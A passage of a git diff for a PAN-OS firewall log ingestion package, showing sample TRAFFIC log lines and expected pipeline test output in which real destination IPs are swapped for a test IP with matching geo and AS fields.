16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json index b9068f5dafd..963b8376a9e 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-traffic-sample.log-expected.json @@ -4,27 +4,29 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.253.152" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 5976, - "ip": "184.51.253.152", + "ip": "175.16.199.1", "packets": 20 }, "rule": { @@ -43,7 +45,7 @@ "packets": 16, "ip": "192.168.15.207" }, - "message": "192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -58,7 +60,7 @@ "destination": { "nat": { "port": 443, - "ip": "184.51.253.152" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -80,7 +82,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:D1fZ8H3SfYS5p3yDzVdiwbnGJlU=" + "community_id": "1:sKYRL+yp3SWr5aT5SC1cvyWNnnM=" } }, "sequence_number": 32091112, @@ -100,8 +102,8 @@ ], "network": { "community_id": [ - "1:MhgXJlTEvCKgoyqMC+Xo7qMVGqc=", - "1:D1fZ8H3SfYS5p3yDzVdiwbnGJlU=" + "1:La5Jgm/PJBlaHF8BtgJSyZEmW9E=", + "1:sKYRL+yp3SWr5aT5SC1cvyWNnnM=" ], "transport": "tcp", "application": "apple-maps", @@ -141,14 +143,14 @@ ], "ip": [ "192.168.15.207", - "184.51.253.152", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 586000000000, - "ingested": "2021-09-08T12:40:05.941767004Z", - "original": "Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031440300Z", + "original": "Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:07.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -171,27 +173,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -210,7 +214,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -225,7 +229,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -299,14 +303,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.941787632Z", - "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031448500Z", + "original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:09.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -329,30 +333,29 @@ "destination": { "nat": { "port": 80, - "ip": "17.253.3.202" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-TX", - "city_name": "Dallas", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Texas", + "region_name": "Jilin", "location": { - "lon": -96.8217, - "lat": 32.7787 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 6185, + "number": 4837, "organization": { - "name": "Apple Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 1035, - "ip": "17.253.3.202", + "ip": "175.16.199.1", "packets": 5 }, "rule": { @@ -371,7 +374,7 @@ "packets": 6, "ip": "192.168.15.207" }, - "message": "192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": 